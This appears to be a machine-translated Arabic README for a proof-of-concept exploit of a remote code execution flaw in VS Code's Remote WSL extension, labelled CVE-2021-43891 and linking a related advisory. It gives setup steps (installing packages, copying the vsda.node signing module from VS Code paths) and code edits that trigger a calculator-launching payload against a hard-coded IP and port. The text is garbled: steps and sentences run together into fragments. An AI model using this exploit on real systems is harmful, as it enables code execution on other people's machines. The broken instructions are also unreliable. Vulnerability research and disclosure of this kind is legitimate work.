
إثبات المفهوم لـ CVE-2021-43891
اطلع على المدونة في https://parsiya.net/blog/2021-12-20-rce-in-visual-studio-codes-remote-wsl-for-fun-and-negative-profit.
أيضاً https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-43907.
npm install.vsda.node من أجل بنية نظامك في /routes/vsda.node.npm start أو استخدم ctrl+shift+b في VS Code.http://localhost:3000 واتبع التعليمات.C:\Program Files\Microsoft VS Code\resources\app\node_modules.asar.unpacked\vsda\build\Release\vsda.node.~/.vscode-server/bin/{commit}/node_modules/vsda/build/Release/vsda.node.من المحتمل أن يعمل هذا محلياً فقط لأننا بحاجة للاتصال مباشرة بمثيل Inspector.
/public/javascripts/nem.js وابحث عن ZZZ.// in nem.js - uncomment the two lines after ZZZ`
// ZZZ
// const res = await (await postJSON('/inspect', packet.data)).arrayBuffer();
// showMessage(bufferToString(res));
/routes/sign.js وابحث عن ZZZ.popCalc.// ZZZ Change the IP address here.
popCalc('192.168.1.130', port);
MIT، انظر LICENSE.